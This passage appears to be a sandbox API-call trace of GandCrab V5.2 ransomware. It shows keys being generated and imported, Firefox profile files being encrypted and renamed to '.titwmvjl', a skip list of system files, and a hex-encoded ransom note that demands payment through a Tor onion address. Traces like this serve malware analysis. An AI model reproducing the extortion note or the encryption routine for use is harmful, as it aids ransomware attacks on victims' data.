flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.852] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".mozlz4 ") returned 8 [0080.852] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.852] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.852] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\store.json.mozlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0080.853] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0080.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.853] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4cdb38) returned 1 [0080.856] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.856] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.856] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.856] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0080.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.857] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.857] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.857] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4cdb38) returned 1 [0080.860] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.860] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.860] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.860] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0080.861] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.861] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.861] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.861] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.861] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4cdb38) returned 1 [0080.864] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.864] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x5034b8) returned 1 [0080.864] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.865] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0080.865] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.865] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0080.865] GetLastError () returned 0x0 [0080.865] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.865] CryptDestroyKey (hKey=0x5034b8) returned 1 [0080.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.866] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.866] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4cdb38) returned 1 [0080.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.869] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503338) returned 1 [0080.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.869] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0080.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.869] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0080.870] GetLastError () returned 0x0 [0080.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.870] CryptDestroyKey (hKey=0x503338) returned 1 [0080.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.870] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.870] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0080.870] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0080.870] ReadFile (in: hFile=0x2dc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e4f8*=0x42, lpOverlapped=0x0) returned 1 [0080.884] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xffffffbe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.885] WriteFile (in: hFile=0x2dc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e4dc*=0x42, lpOverlapped=0x0) returned 1 [0080.886] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.886] WriteFile (in: hFile=0x2dc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0080.888] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.891] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.892] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.892] CloseHandle (hObject=0x2dc) returned 1 [0080.893] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\store.json.mozlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\store.json.mozlz4.titwmvjl"), dwFlags=0x1) returned 1 [0080.894] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.894] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0080.894] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0080.894] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0080.894] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\TITWMVJL-DECRYPT.txt" [0080.894] lstrlenW (lpString=".titwmvjl") returned 9 [0080.894] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\TITWMVJL-DECRYPT.txt") returned 108 [0080.894] VirtualAlloc (lpAddress=0x0, dwSize=0x118, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.894] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 117 [0080.894] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\TITWMVJL-DECRYPT.txt") returned 108 [0080.894] lstrlenW (lpString=".txt") returned 4 [0080.894] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.894] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0080.894] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0080.895] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.895] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\TITWMVJL-DECRYPT.txt") returned 108 [0080.895] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\TITWMVJL-DECRYPT.txt") returned 108 [0080.895] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0080.895] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0080.895] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0080.895] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0080.895] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0080.895] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0080.895] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0080.895] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0080.895] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.895] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0080.895] FindClose (in: hFindFile=0x503978 | out: hFindFile=0x503978) returned 1 [0080.896] CloseHandle (hObject=0x2d4) returned 1 [0080.896] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.896] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0080.897] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0080.897] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\d2ca4a09d2ca4deb61a.lock" [0080.897] lstrlenW (lpString=".titwmvjl") returned 9 [0080.897] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\d2ca4a09d2ca4deb61a.lock") returned 104 [0080.897] VirtualAlloc (lpAddress=0x0, dwSize=0x110, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.897] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 113 [0080.897] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\d2ca4a09d2ca4deb61a.lock") returned 104 [0080.897] lstrlenW (lpString=".lock") returned 5 [0080.897] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.897] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0080.897] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.897] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.898] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.898] lstrcmpW (lpString1="datareporting", lpString2=".") returned 1 [0080.898] lstrcmpW (lpString1="datareporting", lpString2="..") returned 1 [0080.898] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="datareporting" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting" [0080.898] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\" [0080.898] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0080.898] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.898] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0080.898] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.898] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0080.898] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.899] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0080.899] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.899] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0080.899] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.899] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.899] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\\\TITWMVJL-DECRYPT.txt") returned 115 [0080.899] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0080.902] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x3